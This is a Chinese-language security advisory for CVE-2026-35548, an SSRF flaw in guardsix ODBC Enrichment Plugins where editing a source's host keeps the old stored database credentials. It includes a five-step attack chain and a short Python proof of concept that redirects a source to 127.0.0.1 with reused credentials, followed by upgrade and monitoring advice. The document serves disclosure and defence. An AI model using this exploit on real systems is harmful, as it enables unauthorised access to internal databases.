CVE-2026-35548 guardsix ODBC插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-35548

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

guardsix (formerly Logpoint) ODBC Enrichment Plugins

漏洞概述

guardsix（原Logpoint）ODBC Enrichment Plugins 5.2.1之前版本存在严重逻辑缺陷。当编辑现有Enrichment Source并修改目标主机、IP地址或端口时，系统未能清除之前存储的数据库凭证，导致凭证被错误复用。经过身份验证的攻击者（Operator权限）可利用此漏洞将数据库连接重定向到非预期的内部系统，从而引发服务器端请求伪造（SSRF）攻击，并可能导致有效存储的凭证被恶意滥用。

技术细节

该漏洞的根源在于guardsix ODBC Enrichment Plugins的配置管理逻辑未正确处理凭证的生命周期。具体而言，当用户编辑现有的Enrichment Source并修改连接端点（如主机名、IP地址或端口号）时，应用程序未能同步更新或清除先前存储的数据库认证凭据。这导致旧凭证与新端点进行了错误的绑定。攻击者利用此逻辑缺陷，首先需要具备经过身份验证的Operator用户权限。随后，攻击者修改配置，将连接目标重定向到内部受限网络中的敏感系统（例如内网的数据库服务或管理接口）。应用程序服务器随后会尝试使用存储的合法凭证连接到攻击者指定的新端点。由于连接请求是由服务器端发起的，且使用了有效的认证信息，攻击者不仅能够探测内网服务（SSRF），还能以应用程序的身份对内部系统进行未授权的数据读取或操作，从而造成严重的信息泄露和完整性风险。

攻击链分析

STEP 1

1. 获取权限

攻击者获取guardsix系统的Operator级别账户凭证。

STEP 2

2. 修改配置

攻击者登录系统，找到现有的ODBC Enrichment Source配置，并进行编辑。

STEP 3

3. 注入恶意端点

攻击者将连接的目标Host、IP或端口修改为内部敏感系统的地址（如127.0.0.1）。

STEP 4

4. 触发漏洞

系统保存配置时，由于逻辑缺陷，未清除旧的数据库凭证。服务器随后使用该凭证向攻击者指定的内部地址发起连接。

STEP 5

5. 造成影响

成功建立连接，导致SSRF，攻击者利用服务器身份读取或操作内部数据库。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual Proof of Concept for CVE-2026-35548
# This script demonstrates how an authenticated operator might exploit the logic flaw
# by updating the ODBC Enrichment Source endpoint while retaining credentials.

import requests

TARGET_URL = "https://guardsix-server/api/enrichment/sources/{source_id}"
# Attacker controlled session cookie or token
HEADERS = {
    "Authorization": "Bearer <operator_session_token>",
    "Content-Type": "application/json"
}

# Payload changing the host to an internal target (SSRF)
# The 'credentials_id' is intentionally reused from the original valid config
payload = {
    "name": "Legitimate Looking Source",
    "host": "127.0.0.1",         # Internal IP address
    "port": 3306,                # Internal database port
    "database_name": "mysql",
    "credentials_id": "cred_12345_stored" # Logic flaw: credentials are not checked/rotated
}

response = requests.put(TARGET_URL, json=payload, headers=HEADERS, verify=False)

if response.status_code == 200:
    print("[+] Enrichment Source updated successfully.")
    print("[+] Server will now attempt to connect to internal DB using stored credentials.")
else:
    print("[-] Failed to update source.")

影响范围

guardsix ODBC Enrichment Plugins < 5.2.1

防御指南

临时缓解措施

建议立即升级ODBC Enrichment Plugins至5.2.1或更高版本。在升级前，应严格限制Operator账户的权限，并监控内部数据库连接日志，检测是否有异常的连接请求来源。同时，检查现有的Enrichment Source配置，确保未指向非预期的内部地址。